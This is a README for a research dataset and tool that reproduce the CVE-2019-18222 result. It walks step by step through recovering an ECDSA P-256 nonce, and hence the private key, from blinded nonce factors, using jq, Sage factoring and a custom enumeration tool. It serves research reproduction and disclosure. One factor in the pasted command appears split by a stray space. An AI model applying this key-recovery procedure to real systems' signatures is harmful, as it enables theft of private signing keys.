CVE-2019-18222: research data and tooling

This dataset and software tool are for reproducing the research results related to CVE-2019-18222. Description enum contains the key enumeration tool. kt_candidates contains the JSON for blinded nonce candidates, indexed by trial number. JSON fields: kt_candidates: list of nonce candidates. sig_data contains the JSON for ECDSA signatures, index by trial number. JSON fields: p: the prime the curve is defined over. (P-256 here.) Gx, Gy: Generator coordinates. d: Ground truth ECDSA long term key. Px, Py: Public key coordinates. h: SHA-256 digest to sign, encoded to the finite field. k: Ground truth ECDSA nonce. r, s: ECDSA signature. Build cd enum make clean make Run Start with enum as the working directory. cd enum Pull out a kt candidate, in this example index 847. $ jq '.kt_candidates' ../kt_candidates/kt_candidates_847.json [ "0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0" ] Factor that candidate. $ time sage -c "print ecm.factor(0x48ad7217d10f6c7b1a3db836d38aa3972999115f38a6b3d176fc660941aa5c882d2528ec1fc27da7610e7ee3d7dd84367c380259e0386224c2c46aa2a5eb2a0)" [2, 2, 2, 2, 2, 3, 353, 193243, 1540830719, 9263081209, 103633959617085683, 151389566295160172521, 283135469779419532841, 572987990320782777757565685333349772719941819448953457732874126833] real 0m5.837s user 0m5.648s sys 0m0.214s Now pull out the r component of the ECDSA signature for that index, and convert it from hex to base 10. $ jq '.r' ../sig_data/sig_data_847.json "0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67" $ python -c "print 0x30e2ce20a8140177a31a66763d85f431acc9790dd050ffc22ed5d454cdfbbb67" 22111746808803128586382711090186612204136854333384650261207856620766542674791 Now run the enum tool to recover the nonce. $ ./enum Usage: ./enum space delimited flat list of factors in base ten The and arguments are to ease parallel execution; read the source code. But for a single core, pass them as 1 0. $ ./enum 1 0 22111746808803128586382711090186612204136854333384650261207856620766542674791 2 2 2 2 2 3 353 193243 1540830719 9263081209 103633959617085683 151389566295160172521 2831354697794195 32841 572987990320782777757565685333349772719941819448953457732874126833 INFO:target:30E2CE20A8140177A31A66763D85F431ACC9790DD050FFC22ED5D454CDFBBB67 INFO:found:31A52C4960857E6D2F7AD82BAC7D55CE6CC9AD13B959F069002B6A949EA6A048 INFO:tests:7879 where 221..791 is the base-10 r component of the ECDSA signature, and 2 2 .. 572..833 is the full list of blinded nonce factors. In the output: INFO:target: is the hex form of base-10 target input (ECDSA r component). INFO:found: is the hex form of the recovered ECDSA nonce. INFO:tests: is the number of tested nonce candidates (scalar multiplications). We can see this successfully recovered the nonce (hence long term ECDSA private key) correctly: $ jq '.k' ../sig_data/sig_data_847.json "0x31a52c4960857e6d2f7ad82bac7d55ce6cc9ad13b959f069002b6a949ea6a048"